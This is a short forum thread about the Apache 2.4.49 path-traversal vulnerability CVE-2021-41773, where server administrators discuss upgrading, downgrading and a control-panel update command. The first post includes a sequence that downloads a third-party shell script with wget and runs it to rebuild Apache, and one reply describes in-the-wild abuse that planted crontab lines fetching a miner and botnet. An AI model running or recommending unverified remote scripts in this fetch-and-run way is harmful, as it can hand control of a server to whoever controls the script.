Author Topic: Vulnerability apache 2.4.49 || (NVD)CVE-2021-41773  (Read 683 times)

0 Members and 1 Guest are viewing this topic.

Offline
*
Vulnerability apache 2.4.49 || (NVD)CVE-2021-41773
« on: October 06, 2021, 11:38:13 AM »
Apache 2.4.49 has a security problem.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773

Update to 2.4.50  or downgrade to 2.4.48 is recommended

What is the best way to update apache?

Can CWP team provide an update script?

On external sites their are tutorials for this update:
cd /usr/local/src
rm -rf /usr/local/src/apache*
wget --no-cache https://www.mysterydata.com/upload/apache-rebuild.sh
yum install uuid uuid-devel -y
chmod 755 apache-rebuild.sh
sh apache-rebuild.sh


In my opinion it will be better that apache update is supported by the cwp forum.


Offline
*
Re: Vulnerability apache 2.4.49 || (NVD)CVE-2021-41773
« Reply #1 on: October 06, 2021, 01:46:26 PM »
Yes, I also get similar notification from my VPS today.
In my opinion it is also best solution to wait for the CWP upgrade team for cwp-httpd 2.4.50, I hope it will be soon, in day or two.
« Last Edit: October 06, 2021, 01:49:27 PM by idovecer »

Offline
*
Re: Vulnerability apache 2.4.49 || (NVD)CVE-2021-41773
« Reply #2 on: October 06, 2021, 06:23:33 PM »
Waiting is not an option.
I saw abuse of the vulnerability in the wild (injection lines in nobody's crontab trying to download Multi-Vector Miner+Tsunami Botnet).
So I shutdown apache and downgraded to 2.4.48

So CWP: please update fast.

Offline
*
Re: Vulnerability apache 2.4.49 || (NVD)CVE-2021-41773
« Reply #3 on: October 06, 2021, 06:33:42 PM »
cwp update has downgrade to 2.4.48 so simply run update or wait to get updated.
Code: [Select]
/scripts/update_cwp
VPS & Dedicated server provider with included FREE Managed support for CWP.
http://www.studio4host.com/

*** Don't allow that your server or website is down, choose hosting provider with included expert managed support for your CWP.

Offline
*
Re: Vulnerability apache 2.4.49 || (NVD)CVE-2021-41773
« Reply #4 on: October 09, 2021, 06:13:06 AM »
To change to Apache 2.4.50 is not solve the problem.
You have to update to 2.4.51.
You can do that when you change the version number at Line 8 in the script in the first comment here.

The only thing what that script does is recompile Apache from source. So, it would be stupid to downgrade tot a lower version.
« Last Edit: October 09, 2021, 06:21:09 AM by bartje1974 »